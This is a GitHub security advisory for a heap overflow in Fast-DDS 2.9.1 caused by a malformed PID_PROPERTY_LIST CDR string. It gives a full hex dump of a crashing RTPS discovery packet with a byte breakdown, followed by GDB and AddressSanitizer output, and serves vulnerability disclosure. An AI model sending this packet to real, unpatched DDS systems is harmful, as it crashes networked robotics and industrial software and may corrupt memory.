Skip to content

Heap overflow in push_back_helper due to a CDR message

High
MiguelCompany published GHSA-j297-rg6j-m7hx Aug 11, 2023

Package

Fast-DDS

Affected versions

2.9.1

Patched versions

>= 2.11.1 / 2.10.2 / 2.9.2 / 2.6.6

Description

Summary

Heap can be overflowed by providing a PID_PROPERTY_LIST parameter that contains a CDR string with length larger than the size of actual content.

Details

In eprosima::fastdds::dds::ParameterPropertyList_t::push_back_helper, memcpy is called to first copy the octet'ized length and then to copy the data into properties_.data. At the second memcpy, both data and size can be controlled by anyone that sends the CDR string to the discovery multicast port.

For example, consider the following RTPS packet:

0000   52 54 50 53 02 02 ff ff 01 0f 45 d2 b3 f5 58 b9   RTPS......E...X.
0010   01 00 00 00 15 05 00 00 00 00 10 00 00 01 00 c7   ................
0020   00 01 00 c2 00 00 00 00 01 00 00 00 00 03 00 00   ................
0030   50 00 10 00 ff ff ff ff ff ff ff ff ff ff ff ff   P...............
0040   ff ff ff ff 59 00 08 00 01 00 00 00 ff ff ff ff   ....Y...........
0050   ff ff ff ff                                       ....

The last 16 bytes represent the PID_PROPERTY_LIST parameter that triggers the overflow:

59 00 // param id: 0x59
08 00 // param len: 8
01 00 // cdr enc: CDR_LE
00 00 // cdr opt
ff ff ff ff // size: 4294967295
ff ff ff ff // data: 0xffffffff

In GDB, right before the second memcpy:

In file: /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/include/fastdds/dds/core/policy/ParameterTypes.hpp
   1513     {
   1514         fastrtps::rtps::octet* o = (fastrtps::rtps::octet*)&size;
   1515         memcpy(properties_.data + properties_.length, o, 4);
   1516         properties_.length += 4;
   1517 
 ► 1518         memcpy(properties_.data + properties_.length, data, size);
   1519         properties_.length += size;
   1520
   1521         for (uint32_t i = 0; i < alignment; ++i)
   1522         {
   1523             properties_.data[properties_.length + i] = '\0';

...

pwndbg> print data
$1 = (const eprosima::fastrtps::rtps::octet *) 0x6160000069b0 "\377\377\377\377\062"
pwndbg> x/20wx data
0x6160000069b0: 0xffffffff      0x00180032      0x00000001      0x00001cf2
0x6160000069c0: 0x00000000      0x00000000      0x00000000      0xcff03d80
0x6160000069d0: 0x00180031      0x00000001      0x00001cf3      0x00000000
0x6160000069e0: 0x00000000      0x00000000      0xcff03d80      0x00080002
0x6160000069f0: 0x00000014      0x00000000      0x00040058      0x00000c3f
pwndbg> print size
$2 = 4294967295
pwndbg> print properties_
$3 = {
  static representation_header_size = 4,
  encapsulation = 0,
  length = 4,
  data = 0x602000036010 "\377\377\377\377",
  max_size = 8,
  pos = 0
}

When the memcpy is executed, fastdds crashes. When it's compiled with ASAN, ASAN reports a heap overflow error:

=================================================================
==68865==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x616000006b8c at pc 0x0000004d87b7 bp 0x7ffff01d2b90 sp 0x7ffff01d2358
READ of size 4294967295 at 0x616000006b8c thread T2
[Attaching after Thread 0x7ffff01de700 (LWP 68867) fork to child process 68997]
[New inferior 2 (process 68997)]
[Detaching after fork from parent process 68865]
[Inferior 1 (process 68865) detached]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
process 68997 is executing new program: /usr/lib/llvm-12/bin/llvm-symbolizer
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    #0 0x4d87b6 in __asan_memcpy (/home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x4d87b6)
    #1 0x7ffff6b959df in eprosima::fastdds::dds::ParameterPropertyList_t::push_back_helper(unsigned char const*, unsigned int, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/include/fastdds/dds/core/policy/ParameterTypes.hpp:1518:9
    #2 0x7ffff6b95568 in eprosima::fastdds::dds::ParameterPropertyList_t::push_back(unsigned char const*, unsigned int, unsigned char const*, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/include/fastdds/dds/core/policy/ParameterTypes.hpp:1448:9
    #3 0x7ffff6c265d0 in eprosima::fastdds::dds::ParameterSerializer<eprosima::fastdds::dds::ParameterPropertyList_t>::read_content_from_cdr_message(eprosima::fastdds::dds::ParameterPropertyList_t&, eprosima::fastrtps::rtps::CDRMessage_t*, unsigned short) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/fastdds/core/policy/ParameterSerializer.hpp:665:19
    #4 0x7ffff6c2457f in eprosima::fastdds::dds::ParameterSerializer<eprosima::fastdds::dds::ParameterPropertyList_t>::read_from_cdr_message(eprosima::fastdds::dds::ParameterPropertyList_t&, eprosima::fastrtps::rtps::CDRMessage_t*, unsigned short) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/fastdds/core/policy/ParameterSerializer.hpp:62:18
    #5 0x7ffff6c86a42 in eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool)::$_0::operator()(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/builtin/data/ParticipantProxyData.cpp:571:30
    #6 0x7ffff6c744d9 in bool eprosima::fastdds::dds::ParameterList::readParameterListfromCDRMsg<eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool)::$_0>(eprosima::fastrtps::rtps::CDRMessage_t&, eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool)::$_0, bool, unsigned int&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/fastdds/core/policy/ParameterList.hpp:133:22
    #7 0x7ffff6c72dc8 in eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/builtin/data/ParticipantProxyData.cpp:652:16
    #8 0x7ffff6bc73f2 in eprosima::fastrtps::rtps::PDPListener::onNewCacheChangeAdded(eprosima::fastrtps::rtps::RTPSReader*, eprosima::fastrtps::rtps::CacheChange_t const*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/builtin/discovery/participant/PDPListener.cpp:104:36
    #9 0x7ffff60be210 in eprosima::fastrtps::rtps::StatelessReader::change_received(eprosima::fastrtps::rtps::CacheChange_t*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/reader/StatelessReader.cpp:329:31
    #10 0x7ffff60c3f4d in eprosima::fastrtps::rtps::StatelessReader::processDataMsg(eprosima::fastrtps::rtps::CacheChange_t*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/reader/StatelessReader.cpp:557:18
    #11 0x7ffff61636fd in eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)::$_0::operator()(eprosima::fastrtps::rtps::RTPSReader*) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:202:25
    #12 0x7ffff61278ef in void eprosima::fastrtps::rtps::MessageReceiver::findAllReaders<eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)::$_0>(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)::$_0 const&) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:668:17
    #13 0x7ffff6125d9d in eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:205:5
    #14 0x7ffff615e4f6 in void std::__invoke_impl<void, void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>(std::__invoke_memfun_deref, void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/invoke.h:73:14
    #15 0x7ffff615e130 in std::__invoke_result<void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>::type std::__invoke<void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>(void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/invoke.h:95:14
    #16 0x7ffff615df24 in void std::_Bind<void (eprosima::fastrtps::rtps::MessageReceiver::* (eprosima::fastrtps::rtps::MessageReceiver*, std::_Placeholder<1>, std::_Placeholder<2>))(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)>::__call<void, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, 0ul, 1ul, 2ul>(std::tuple<eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>&&, std::_Index_tuple<0ul, 1ul, 2ul>) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/functional:400:11
    #17 0x7ffff615dc1b in void std::_Bind<void (eprosima::fastrtps::rtps::MessageReceiver::* (eprosima::fastrtps::rtps::MessageReceiver*, std::_Placeholder<1>, std::_Placeholder<2>))(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)>::operator()<eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, void>(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/functional:482:17
    #18 0x7ffff615d6ba in std::_Function_handler<void (eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), std::_Bind<void (eprosima::fastrtps::rtps::MessageReceiver::* (eprosima::fastrtps::rtps::MessageReceiver*, std::_Placeholder<1>, std::_Placeholder<2>))(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)> >::_M_invoke(std::_Any_data const&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/std_function.h:300:2
    #19 0x7ffff6155aff in std::function<void (eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)>::operator()(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) const /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/std_function.h:688:14
    #20 0x7ffff6140f58 in eprosima::fastrtps::rtps::MessageReceiver::proc_Submsg_Data(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastrtps::rtps::SubmessageHeader_t*) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:841:5
    #21 0x7ffff612fe06 in eprosima::fastrtps::rtps::MessageReceiver::processCDRMsg(eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::CDRMessage_t*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:418:29
    #22 0x7ffff61a62f6 in eprosima::fastrtps::rtps::ReceiverResource::OnDataReceived(unsigned char const*, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::Locator_t const&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/network/ReceiverResource.cpp:132:14
    #23 0x7ffff65dd753 in eprosima::fastdds::rtps::UDPChannelResource::perform_listen_operation(eprosima::fastrtps::rtps::Locator_t) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/transport/UDPChannelResource.cpp:70:33
    #24 0x7ffff65e82bd in void std::__invoke_impl<void, void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t>(std::__invoke_memfun_deref, void (eprosima::fastdds::rtps::UDPChannelResource::*&&)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*&&, eprosima::fastrtps::rtps::Locator_t&&) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/invoke.h:73:14
    #25 0x7ffff65e7eaa in std::__invoke_result<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t>::type std::__invoke<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t>(void (eprosima::fastdds::rtps::UDPChannelResource::*&&)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*&&, eprosima::fastrtps::rtps::Locator_t&&) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/invoke.h:95:14
    #26 0x7ffff65e7e1a in void std::thread::_Invoker<std::tuple<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t> >::_M_invoke<0ul, 1ul, 2ul>(std::_Index_tuple<0ul, 1ul, 2ul>) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/thread:244:13
    #27 0x7ffff65e7d84 in std::thread::_Invoker<std::tuple<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t> >::operator()() /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/thread:251:11
    #28 0x7ffff65e7698 in std::thread::_State_impl<std::thread::_Invoker<std::tuple<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t> > >::_M_run() /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/thread:195:13
    #29 0x7ffff477cde3  (/lib/x86_64-linux-gnu/libstdc++.so.6+0xd6de3)
    #30 0x7ffff4c22608 in start_thread /build/glibc-SzIz7B/glibc-2.31/nptl/pthread_create.c:477:8
    #31 0x7ffff4469132 in clone /build/glibc-SzIz7B/glibc-2.31/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:95

0x616000006b8c is located 0 bytes to the right of 524-byte region [0x616000006980,0x616000006b8c)
allocated by thread T0 here:
    #0 0x4d9582 in calloc (/home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x4d9582)
    #1 0x7ffff5fb08e1 in eprosima::fastrtps::rtps::TopicPayloadPool::PayloadNode::PayloadNode(unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/history/TopicPayloadPool.hpp:144:30
    #2 0x7ffff5fb00d4 in eprosima::fastrtps::rtps::TopicPayloadPool::do_allocate(unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/history/TopicPayloadPool.cpp:192:47
    #3 0x7ffff5fb1562 in eprosima::fastrtps::rtps::TopicPayloadPool::reserve(unsigned int, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/history/TopicPayloadPool.cpp:253:32
    #4 0x7ffff5fb5492 in eprosima::fastrtps::rtps::PreallocatedReallocTopicPayloadPool::reserve_history(eprosima::fastrtps::rtps::PoolConfig const&, bool) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/history/./TopicPayloadPool_impl/PreallocatedWithRealloc.hpp:58:9
    #5 0x7ffff5fc0fba in eprosima::fastrtps::rtps::detail::TopicPayloadPoolProxy::reserve_history(eprosima::fastrtps::rtps::PoolConfig const&, bool) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/history/TopicPayloadPoolRegistry_impl/TopicPayloadPoolProxy.hpp:83:29
    #6 0x7ffff6bbbeb0 in eprosima::fastrtps::rtps::PDPSimple::createPDPEndpoints() /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/builtin/discovery/participant/PDPSimple.cpp:307:27
    #7 0x7ffff6b79022 in eprosima::fastrtps::rtps::PDP::initPDP(eprosima::fastrtps::rtps::RTPSParticipantImpl*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/builtin/discovery/participant/PDP.cpp:393:10
    #8 0x7ffff6bb67d4 in eprosima::fastrtps::rtps::PDPSimple::init(eprosima::fastrtps::rtps::RTPSParticipantImpl*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/builtin/discovery/participant/PDPSimple.cpp:119:15
    #9 0x7ffff6b665df in eprosima::fastrtps::rtps::BuiltinProtocols::initBuiltinProtocols(eprosima::fastrtps::rtps::RTPSParticipantImpl*, eprosima::fastrtps::rtps::BuiltinAttributes&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/builtin/BuiltinProtocols.cpp:130:18
    #10 0x7ffff61b2093 in eprosima::fastrtps::rtps::RTPSParticipantImpl::RTPSParticipantImpl(unsigned int, eprosima::fastrtps::rtps::RTPSParticipantAttributes const&, eprosima::fastrtps::rtps::GuidPrefix_t const&, eprosima::fastrtps::rtps::GuidPrefix_t const&, eprosima::fastrtps::rtps::RTPSParticipant*, eprosima::fastrtps::rtps::RTPSParticipantListener*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/participant/RTPSParticipantImpl.cpp:422:31
    #11 0x7ffff61b9739 in eprosima::fastrtps::rtps::RTPSParticipantImpl::RTPSParticipantImpl(unsigned int, eprosima::fastrtps::rtps::RTPSParticipantAttributes const&, eprosima::fastrtps::rtps::GuidPrefix_t const&, eprosima::fastrtps::rtps::RTPSParticipant*, eprosima::fastrtps::rtps::RTPSParticipantListener*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/participant/RTPSParticipantImpl.cpp:449:7
    #12 0x7ffff62429f2 in eprosima::fastrtps::rtps::RTPSDomainImpl::createParticipant(unsigned int, bool, eprosima::fastrtps::rtps::RTPSParticipantAttributes const&, eprosima::fastrtps::rtps::RTPSParticipantListener*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/RTPSDomain.cpp:216:21
    #13 0x7ffff6244a87 in eprosima::fastrtps::rtps::RTPSDomain::createParticipant(unsigned int, bool, eprosima::fastrtps::rtps::RTPSParticipantAttributes const&, eprosima::fastrtps::rtps::RTPSParticipantListener*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/RTPSDomain.cpp:88:12
    #14 0x7ffff650623c in eprosima::fastdds::dds::DomainParticipantImpl::enable() /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/fastdds/domain/DomainParticipantImpl.cpp:269:16
    #15 0x7ffff6584ef5 in eprosima::fastdds::dds::DomainParticipant::enable() /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/fastdds/domain/DomainParticipant.cpp:110:36
    #16 0x7ffff64d3b15 in eprosima::fastdds::dds::DomainParticipantFactory::create_participant(unsigned int, eprosima::fastdds::dds::DomainParticipantQos const&, eprosima::fastdds::dds::DomainParticipantListener*, eprosima::fastdds::dds::StatusMask const&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/fastdds/domain/DomainParticipantFactory.cpp:187:51
    #17 0x557885 in HelloWorldSubscriber::init() (/home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x557885)
    #18 0x564840 in main (/home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x564840)
    #19 0x7ffff436e082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16

Thread T2 created by T0 here:
    #0 0x4c376c in pthread_create (/home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x4c376c)
    #1 0x7ffff477d0a8 in std::thread::_M_start_thread(std::unique_ptr<std::thread::_State, std::default_delete<std::thread::_State> >, void (*)()) (/lib/x86_64-linux-gnu/libstdc++.so.6+0xd70a8)
    #2 0x7ffff65dcf79 in eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp>&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/transport/UDPChannelResource.cpp:42:12
    #3 0x7ffff671bce3 in eprosima::fastdds::rtps::UDPTransportInterface::CreateInputChannelResource(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastrtps::rtps::Locator_t const&, bool, unsigned int, eprosima::fastdds::rtps::TransportReceiverInterface*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/transport/UDPTransportInterface.cpp:233:50
    #4 0x7ffff67213d3 in eprosima::fastdds::rtps::UDPTransportInterface::OpenAndBindInputSockets(eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastdds::rtps::TransportReceiverInterface*, bool, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/transport/UDPTransportInterface.cpp:207:34
    #5 0x7ffff666c089 in eprosima::fastdds::rtps::UDPv4Transport::OpenInputChannel(eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastdds::rtps::TransportReceiverInterface*, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/transport/UDPv4Transport.cpp:327:19
    #6 0x7ffff61a422b in eprosima::fastrtps::rtps::ReceiverResource::ReceiverResource(eprosima::fastdds::rtps::TransportInterface&, eprosima::fastrtps::rtps::Locator_t const&, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/network/ReceiverResource.cpp:43:24
    #7 0x7ffff6191a95 in eprosima::fastrtps::rtps::NetworkFactory::BuildReceiverResources(eprosima::fastrtps::rtps::Locator_t&, std::vector<std::shared_ptr<eprosima::fastrtps::rtps::ReceiverResource>, std::allocator<std::shared_ptr<eprosima::fastrtps::rtps::ReceiverResource> > >&, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/network/NetworkFactory.cpp:74:25
    #8 0x7ffff61b7d3a in eprosima::fastrtps::rtps::RTPSParticipantImpl::createReceiverResources(eprosima::fastdds::rtps::LocatorList&, bool, bool) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/participant/RTPSParticipantImpl.cpp:1680:38
    #9 0x7ffff61b0be5 in eprosima::fastrtps::rtps::RTPSParticipantImpl::RTPSParticipantImpl(unsigned int, eprosima::fastrtps::rtps::RTPSParticipantAttributes const&, eprosima::fastrtps::rtps::GuidPrefix_t const&, eprosima::fastrtps::rtps::GuidPrefix_t const&, eprosima::fastrtps::rtps::RTPSParticipant*, eprosima::fastrtps::rtps::RTPSParticipantListener*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/participant/RTPSParticipantImpl.cpp:354:5
    #10 0x7ffff61b9739 in eprosima::fastrtps::rtps::RTPSParticipantImpl::RTPSParticipantImpl(unsigned int, eprosima::fastrtps::rtps::RTPSParticipantAttributes const&, eprosima::fastrtps::rtps::GuidPrefix_t const&, eprosima::fastrtps::rtps::RTPSParticipant*, eprosima::fastrtps::rtps::RTPSParticipantListener*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/participant/RTPSParticipantImpl.cpp:449:7
    #11 0x7ffff62429f2 in eprosima::fastrtps::rtps::RTPSDomainImpl::createParticipant(unsigned int, bool, eprosima::fastrtps::rtps::RTPSParticipantAttributes const&, eprosima::fastrtps::rtps::RTPSParticipantListener*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/RTPSDomain.cpp:216:21
    #12 0x7ffff6244a87 in eprosima::fastrtps::rtps::RTPSDomain::createParticipant(unsigned int, bool, eprosima::fastrtps::rtps::RTPSParticipantAttributes const&, eprosima::fastrtps::rtps::RTPSParticipantListener*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/rtps/RTPSDomain.cpp:88:12
    #13 0x7ffff650623c in eprosima::fastdds::dds::DomainParticipantImpl::enable() /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/fastdds/domain/DomainParticipantImpl.cpp:269:16
    #14 0x7ffff6584ef5 in eprosima::fastdds::dds::DomainParticipant::enable() /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/fastdds/domain/DomainParticipant.cpp:110:36
    #15 0x7ffff64d3b15 in eprosima::fastdds::dds::DomainParticipantFactory::create_participant(unsigned int, eprosima::fastdds::dds::DomainParticipantQos const&, eprosima::fastdds::dds::DomainParticipantListener*, eprosima::fastdds::dds::StatusMask const&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/src/cpp/fastdds/domain/DomainParticipantFactory.cpp:187:51
    #16 0x557885 in HelloWorldSubscriber::init() (/home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x557885)
    #17 0x564840 in main (/home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x564840)
    #18 0x7ffff436e082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/seulbae/ddssecurity/targets/fastdds-2.9.1/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x4d87b6) in __asan_memcpy
Shadow bytes around the buggy address:
  0x0c2c7fff8d20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2c7fff8d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2c7fff8d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2c7fff8d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2c7fff8d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c2c7fff8d70: 00[04]fa fa fa fa fa fa fa fa fa fa fa fa fa fa
